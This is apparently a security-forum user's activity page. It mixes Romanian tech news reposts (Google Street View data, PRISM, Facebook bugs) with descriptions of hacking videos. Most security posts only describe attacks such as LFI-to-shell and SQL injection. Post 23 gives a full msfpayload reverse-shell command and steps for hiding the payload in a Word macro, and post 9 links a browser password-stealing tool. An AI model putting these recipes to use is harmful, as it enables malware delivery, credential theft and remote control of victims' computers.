Jump to content

Kwelwild

Active Members
 View Profile  See their activity

  • Posts

    638

  • Joined

  • Last visited

  • Days Won

    1

 Content Type 

Everything posted by Kwelwild

  1. Kwelwild
    Compania americana are 35 de zile pentru a sterge informatiile culese "accidental" din retelele Wi-Fi neprotejate. Desi a promis in mai multe randuri ca sterge informatiile intrate in posesia ei in timpul culegerilor de date pentru serviciul Street View, Google a tot "uitat" sa faca asta pana cand autoritatile britanice au eliberat un ordin de executare. In acest ordin se arata ca informatiile culese din retelele Wi-Fi neprotejate trebuie sterse in cel mult 35 de zile. Mai multe organizatii non-guvernamentale au luat pozitie in fata actiunii companiei americane, considerand-o "una dintre cele mai grave incalcari ale intimitatii". In acelasi timp, autoritatile britanice si-au aparat decizia cosiderand-o "o lectie pentru companiile care folosesc tehnologia prin incalcarea unor drepturi elementare ale omului. Google s-a aparat sustinand ca "se lupta din greu pentru a rezolva problemele ivite" si ca nu s-a folosit de datele culese "accidental" in campania Street View. Compania americana a luat la cunostinta ordinul emis de britanici si a promis punerea lui in aplicare. Sursa: Google, obligata sa stearga datale culese in timpul campaniei Street View - www.yoda.ro
  2. Kwelwild
    Skype recunoaste ca a permis autoritatilor americane accesul la datele utilizatorilor Project Chess, cum a fost denumita strategia de ajutare a National Security Agency, a functionat inainte ca Microsoft sa cumpere compania. Scandalul Prism, dupa numele programului prin care NSA primea datele utilizatorilor Apple, Facebook si Google, scoate la iveala un altul: chiar si Skype, unul dintre liderii comunicarii audio/video online, recunoaste ca a furnizat datele utilizatorilor sai autoritatior americane. Doar o parte dintre cei din conducerea companiei cumparate ulterior de Microsoft aveau informatii despre acest proiect. Cu doar un an in urma, Skype a refuzat sa comenteze zvonurile conform carora Microsoft ar fi cerut, dupa achizionare, schimbarea softului pentru a permite autoritatilor un acces mai usor la datele utilizatorilor. Conform documentului Prism, Skype a colaborat cu NSA inca din februarie 2011, cu opt luni inainte de a fi preluata de compania fondata de celebrul Bill Gates. Microsoft a refuzat ca comenteze datele din Project Chess. De altfel, toate companiile implicate in scandalul Prism au dezmintit ca autoritatile americane au avut acces direct la datele utilizatorilor, informatiile fiind oferite doa in cazul unor actiuni legale. Sursa: Skype recunoaste ca a permis autoritatilor americane accesul la datele utilizatorilor - www.yoda.ro
  3. Kwelwild
    Description: Short video demonstrating a python script I put together in order to fill an Access Points client table. The python script makes use of the ability to fake authenticate with a Access Point using WEP as an encryption method. It sends a number of fake authentication requests (specified by the user) to the access points using random mac addresses, thus fill the table not allowing any clients to connect. This was done as one of the exercises from "Backtrack 5 Wireless Penetration Testing" The code is within the youtube description for you to play with! Original Source: Sursa: Wireless Fake Authentication Dos (Wep)
  4. Kwelwild
    Description: This video shows, how to take control over a remote system via XSS (Cross Side Scripting) The video is done by Wo0rmer. His Facebook: https://www.facebook.com/SHAMEER7 -------------------------------------- Visit us @ http://www.openfire-security.net/ Security Forum @ http://forum.openfire-security.net/ Coding Forum @ http://lab.openfire-security.net/ Facebook @ https://www.facebook.com/OpenFireSec Original Source: Sursa: Take Control Over A Remote System Via Xss
  5. Kwelwild
    Description: Contactless and mobile payments are set to become the next big thing -- from payment cards which allow for 'tap and go' transactions, to add-on hardware for iPhones and iPads. This talk aims to educate about how contactless cards work from the protocol layer up, what data is on them and how it's protected. It will also provide practical information on the methods which can be used to 'eavesdrop' on contactless transactions, and if this is something you should be worried about next time you go shopping. Technical detail will be provided on the cloning of contactless cards, and the acronym soup of SDA, DDA, CDA, CVC3, iCVV, AC, ARCQ, SAD will be sifted to separate out the juicy noodles of information. Recent advances in mobile payments will be discussed, along with details on what plans are in place to secure this method of payment. For more information, please visit: :- Breakpoint 2012 Speakers List Original Source: Sursa: Mobile And Contactless Payment Security
  6. Kwelwild
    Description: The talk will focus on modern SSL traffic analysis attacks. Although it has been known and great papers have been published about it most people still are not aware of the length an attacker can go through in order to extract useful information from the SSL sessions. By showing some large targets and some useful progress in that space it is hoped that the audience will gain a better understanding of what SSL traffic analysis is, that it is a real threat (depending on the skills of the assumed adversary), and some knowledge on how to try and avoid these type of attacks. There will be a bunch of research tools accompanying the talk with at least one being a proof of concept on how to do traffic analysis on Google Maps. For more information, please visit: :- Breakpoint 2012 Speakers List Original Source: Sursa: Ssl Traffic Analysis Attacks - Vincent Berg
  7. Kwelwild
  8. Kwelwild
    Alerta pe Facebook! 6 milioane de utilizatori, puternic afectati. Facebook: "Ne e rusine" "Nicio companie nu poate garanta 100% prevenirea bugurilor", e scuza celor de la Facebook. Facebook alerteaza 6 milioane de utilizatori. Emailurile lor sau numerele de telefon au fost aratate altor membri ai retelei de socializare. Oficialii Facebook au declarat ca au descoperit si rezolvat bugul. Acesta a iesit la iveala gratie programului White Hat al companiei, prin care hackerii care descopera vulnerabilitati si le anunta, primesc bani. Bugul a fost reparat in 24 de ore de la semnalarea lui, a declarat un purtator de cuvant al companiei lui Zuckerberg pentru cnet. E ceva care ne supara si de care ne este rusine (declaratie oficiala Facebook) Pe blogul de securitate, cei de la Facebook si-au cerut scuze utilizatorilor si au spus ca vor lucra "de doua ori mai mult pentru a se asigura ca astfel de lucruri nu se vor repeta". Cei care gasesc buguri si anunta Facebook, pot primi incepand de la 500 de dolari. Sursa: Alerta pe Facebook! 6 milioane de utilizatori, puternic afectati. Facebook: Ne e rusine - www.yoda.ro
  9. Kwelwild
    http://www.youtube.com/watch?v=HsYNiYidipE&feature=player_embedded Description: Download: https://anonfiles.com/file/c9063d6213dfed8d30310131e04b0457 Virus Scan: https://www.virustotal.com/en/file/95109fc943a48cbaf0c566c573db65b98ccd7228ddf0e79736 1469e5f11290e1/analysis/ Hello Guys, People usually save passwords of websites and they are stored inside databases relevant to the browser they use. As you know there are many tools coded to dump for different browsers. So I wanted to put this mess into a single nice program. I have included 5 popular browsers namely Google Chrome, Mozilla Firefox, Opera, Internet Explorer and Safari. Also I included a option to self destruct which is a suicide task. Added some cool voice Original Source: Browser Freak - YouTube Sursa: Browser Freak
  10. Kwelwild
    Description: This video is all about exploiting Oracle Java Applet Driver Manager Vulnerability with Metasploit Framework. This Vulnerability discovered and exploited by James Forshaw during Pwn2Own 2013 and vulnerability is now fixed by Oracle. Affected versions are JSE 7 Update 17 and before. More Information please visit : -http://eromang.zataz.com/2013/06/19/cve-2013-1488-oracle-java-applet-driver-manager-vulnerability-metasploit-demo/ Original Source: Sursa: Oracle Java Applet Driver Manager Vulnerability Metasploit Demo
  11. Kwelwild
    Description: In this video you will learn how to secure your FTP connection with TLS/SSL and after setting it up your traffic will be encrypted. Why we need to use SSL. Because lets see if someone is capturing your traffic using Wireshark or other utility so the ones you logging into your FTP server so all your data recorded in a plain text and it is very easy to crack down your password. That's why we are using SSL connection for securing your network. Original Source: Sursa: Secure Ftp With Tls/Ssl
  12. Kwelwild
    Uitati aici Tri(coaie)cou.
  13. Kwelwild
    De schimbare se bucura deja si utilizatorii din Romania. Dupa Hashtag, Facebook a adus acum o noua schimbare de care utilizatorii retelei sunt incantati. Ei pot, acum, atasa poze la comentariile postate. In partea din dreapta a casetei in care trebuie sa introduci textul, iti apare un aparat foto pe care trebuie sa dai click daca vrei ca vorbele tale sa fie insotite si de o fotografie. Aceasta va aparea in interiorul mesajului Chiar daca este un feature simplu, multi utilizatori s-au bucurat, mai ales ca unii dintre ei spun ca au simtit de multe ori nevoia sa ataseze poze atunci cand fac diverse afirmatii. Schimbarea se aplica partial si pentru utilizatorii aplicatiilor de mobil ale Facebook. Deocamdata, insa, acestia vor putea vedea pozele postate de prieteni la comentarii, insa nu vor putea sa urce imagini. Spre deosebire de Google+, GIF-urile animate nu sunt recunoscute in acest moment, scrie theverge. Sursa: Facebook iti permite, acum, sa faci ceva deosebit cand postezi comentarii - www.yoda.ro
  14. Kwelwild
    Facebook, cea mai mare retea de socializare din lume, are "peste un milion de advertiseri activi", potrivit unui anunt facut marti pe aceasta platforma online, informeaza AFP. Unul dintre responsabilii de marketing ai Facebook, Dan Levy, a multumit celor peste un milion de companii care investesc in prezent in publicitatea pe aceasta retea de socializare. "Voi ati ales Facebook ca partener pentru a va creste business-ul. Apreciem sansa de a lucra alaturi de voi", le-a transmis Dan Levy companiilor care se promoveaza pe Facebook. Vanzarile Facebook in primul trimestru au crescut cu 38%, la 1,46 miliarde de dolari, depasind estimarile analistilor, iar profitul net a avansat cu 58%, la 217 milioane de dolari, semn ca publicitatea pe dispozitive mobile genereaza afaceri tot mai mari pentru cea mai mare retea de socializare, dupa cum a relatat Bloomberg, in luna mai. Numarul utilizatorilor Facebook a crescut cu 23% in ultimele 12 luni, la 1,11 miliarde, dintre care 68%, sau 751 milioane, acceseaza serviciile retelei de pe dispozitive mobile, cu 54% mai multi decat la inceputul anului trecut. Pe de alta parte, Financial Times a anuntat in mai ca Facebook va introduce incepand din luna iulie spoturi publicitare video in pagina "Noutati" (News Feed), pentru a obtine o noua sursa de venit de la advertiseri, decizie care i-ar putea nemultumi pe unii utilizatori daca va deranja semnificativ functionalitatea retelei de socializare. Noile reclame video ar putea genera venituri de pana la 1,5 milioane de dolari pe zi. Reteaua de socializare incearca astfel sa acceseze bugetele uriase de marketing TV ale companiilor. Publicitatea video digitala reprezinta mai putin de 5% din piata spoturilor TV din SUA, de 64,5 miliarde de dolari pe an, insa se extinde rapid. EMarketer estimeaza o crestere de 41% in acest an, la 4,1 miliarde de dolari. Sursa: Facebook are peste un milion de advertiseri activi - www.yoda.ro
  15. Kwelwild
    Google investeste 5 milioane de dolari in "curatarea" internetului de pornografie infantila Gigantul american incearca prin aceasta actiune sa inchida gura celor care il invinuiesc de neimplicare in oprirea raspandirii imaginilor in care cei mici sunt abuzati. Google a bagat adanc mana in buzunar, de aceasta data nu pentru a achizitiona o alta firma pe care s-o inglobeze in portofoliu, ci pentru a "curata" internetul de pornografie infantila. Americanii vor dona, astfel, 1 milion de lire sterline organizatiei britanice Internet Watch Foundation, in timp ce 1 milion dolari se vor indrepta catre US National Centre for Missing and Exploited Children, iar alte doua milioane catre Child Protection Technology Fund, o fundatie a Google. De asemenea, fundatii de acelati tip din Belgia, Canada, Australia si America Latina vor primi fonduri de la Google. The Culture Secretary, Ministerul Culturii din Statele Unite, a tras un semnal de alarma cu privire la pornografia infantila si pericolele ei dupa uciderea a doua fete, Tia Sharp si April JOnes, criminalii fiind consumatori de astfel de "forma de divertisment". Oficialii americanii i-au indemnat si pe alti jucatori mari din online sa se alature demersului: Yahoo, Microsoft, Twitter, Facebook dar si BT, Sky, Virgin Media, TalkTalk, Vodafone, O2, EE si Three. Chiar daca cei de la Google declara ca au "toleranta zero" pentru abuzurile sexuale asupra minorilor, tot mai multe voci spun ca firma americana face prea putine pentru nu oferi, prin motorul de cautare, rezultate care duc spre asemenea site-uri. Banii oferiti Internet Watch Foundation vor dubla numarul de analisti care vor "curata" internetul de pornografie infantila. Sursa: Google investeste 5 milioane de dolari in curatarea internetului de pornografie infantila - www.yoda.ro
  16. Kwelwild
    Description: In this video you will learn how to Bypass Logging using Mysql Injection tricks. If you are using MD5 function on password still you can bypass the validation. This is the basic trick still there are lots of applications vulnerable to this vulnerability due to poor web application development. Original Source: Sursa: Mysql Injection - Login Bypass
  17. Kwelwild
    Description: In this video you will learn how to exploit a Local File Inclusion (LFI) using CURL and NETCAT. In this video he will create a Vulnerable PHP and exploiting it using log injection and gaining the shell on the system. Original Source: Sursa: From Lfi To Shell: Curl + Netcat Strike
  18. Kwelwild
    Description: In this video you will learn how to exploit LFI vulnerability using LOG file injection. He is using a Burp-Suite tool for exploiting LFI vulnerability. Original Source: Sursa: Lfi Exploit Via Log File Injection
  19. Kwelwild
    Description: In this video you will learn how to exploit a web application after exploiting a web apps you will get a shell. Basically In this video He is using an Advanced SQLMAP function to go from standard SQL injection to OS command execution. Original Source: Sursa: Sqlmap To Shell
  20. Kwelwild
    Description: In this video you will learn how to use Swaparoo post exploitation script for maintaining the access. After successful exploitation maintaining the access is the most important thing so this script will help you to maintain your access to a windows system. Basically he will replace the "Ease of Access Center" to "CMD" and when ever you try to open "Easy Of Access Center" you will get the CMD shell Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Meterpreter Swaparoo Post Exploit Script
  21. Kwelwild
    Description: In this video you will learn how to exploit multiple systems with MSFCLI and Bash Scripting. Justin Exploiting common vulnerabilities using MSFCLI basically we are writing a bash script and the script will follow our instructions and exploiting the system. This is useful because the whole process is automatic. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Hack Multiple Systems With Msfcli And Bash Scripting
  22. Kwelwild
    Description: In this video you will learn how to exploit MS-SQL for direct access with credentials to deliver your payload and command execution using cmdshell. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Ms-Sql Injection 2 Meterpreter Shell (Credentials)
  23. Kwelwild
    http://www.youtube.com/watch?feature=player_embedded&v=DZawcrx5b_U Description: Hello guys today I taught of making a small tutorial on using metasploit payloads as macros and use them effectively inside word, excel, access documents. So as you know creating a normal metasploit backdoor executable using msfpayload, just give the ‘V’ options which msfpayload will generate the payload in VBScript. In this case I will use a reverse connection because I love it msfpayload windows/meterpreter/reverse_tcp LHOST= [Your local Host] LPORT= [Your Local Port] V > Shell.txt Well now you should create a new word file and go to view > macors and type a random name and create a new macro. Next open up our VBScript which is shell.txt and copy the top part in the file into the Visual Basic editor and save it. Top part in the sense which gives the required functions to execute our payload. After that copy the payload part into our document and you may make the size small and make the color change into white to make non suspicious. Use multi/handler which handles exploits outside the framework to listen. So that’s it now if correctly configured everything you should get a nice reverse connection back to you once the file is opened ?. Also we can convert any executable to VBS using exe2vbs.rb located at /pentest/exploits/framework/tools/.You can imagine beyond the scope how we can infect and I think more ideas may have occurred inside you .I hope you learnt something. Thank You. Email: unownsec[at]gmail[dot]com Follow @UnownSec Un0wn_X Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Using Metasploit Payloads in Macros - YouTube Sursa: Using Metasploit Payloads In Macros
  24. Kwelwild
    Baloanele cu heliu ar circla in intreaga lume, echipate in asa fel incat sa poata transmita semnal WiFi. Google a anuntat sambata ca are pregatite 30 de baloane de acest fel care sa survoleze cerul Noii Zeelande, pentru a furniza conexiune la internet in zonele rurale sau sarace, scrie incont.ro. Experimentul, denumit Project Loon, a fost pus la punct de catre tehnicienii din laboratorul ultra secret Google X, din Silicon Valey, acelasi loc din care au iesit ideile pentru masinile care se conduc singure si ochelarii echipati cu computere si comenzi vocale. Reprezentantii Google au declarat ca, desi sunt constienti ca unele idei sunt prea fanteziste pentru a produce bani, le dau curs incercand sa rezolve unele din marile probleme mondiale si sa atraga mai multi clienti. Toate aceste proiecte fac parte insa din planul de expansiune al Google, care isi doreste acces catre toti potentialii consumatori de internet. In prezent, compania are cel mai folosit motor de cautare de pe Web, serviciul de e-mail si site-ul de continut video, in timp ce software-ul Android pentru mobil a devenit cel mai popular din lume. Aceste unelte au permis o monitorizare precisa a comportamentului consumatorului, date pe care Google le foloseste apoi si le interpreteaza ca sa le vanda publicitarilor. Practicile sale au generat mai multe ingrijorari, printre care ultima se refera la accesul guvernului Statelor Unite la informatiile confidentiale despre utilizatorii serviciului de internet, prin Google. Dar baloanele cu heliu reprezinta si incercarea companiei de a patrunde pe piata telecomunicatiilor. Google a stabilit conexiuni la internet in Kansas, de exemplu, sau in cartierul Chelsea in Mahattan, la viteze de 100 de ori mai mari decat cele la care sunt obisnuiti consumatorii. Mike Cassidy, directorul Project Loon, spune ca scopul este furnizarea unor conexiuni ieftine pe tot Globul. In tarile africane, de pilda, costul unui abonament lunar la internet este mai mare decat salariul. “Ne concentram asupra unei probleme enorme si nu sustinem ca am avea noi solutia unica astazi. Dar credem ca putem ajuta si incepe o discutie despre cum sa ajungem la cei cinci miliarde de oameni din regiunile indepartate”, a spus Cassidy, intr-un interviu telefonic pentru Washington Post. Baloanele care plutesc acum deasupra Noii Zeelande au un diametru de marimea catorva camionete si sunt aproape invizibile spectatorilor de la sol. Pentru a putea transmite informatii cel putin la viteze 3G, acestea transporta antene, radiouri, panouri solare si echipament de navigare, care comunica la sol cu acoperisurile echipate la randul lor cu antene de receptie. Baloanele nu au insa motoare si depind in mare masura de viteza si directia vantului. Sursa: Google vrea Internet peste tot prin baloane inaltate la limita atmosferei - www.yoda.ro
  25. Kwelwild
    Description: You must be signed into a facebook account to redirect sites.For more details about this bug,visit my blogspot || Welcome To My Blog ||: Facebook Open URL Redirection Vulnerability 2013 [#] Title : Facebook Open URL Redirection Vulnerability 2013 [#] Status : Unfixed [#] Severity : High [#] Works on : Any browser with any version [#] Author : Arul Kumar.V [#] Email : arul.xtronix@gmail.com Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: https://vimeo.com/68469298 Sursa: Facebook Open Url Redirection Vulnerability 2013
×
×
  • Create New...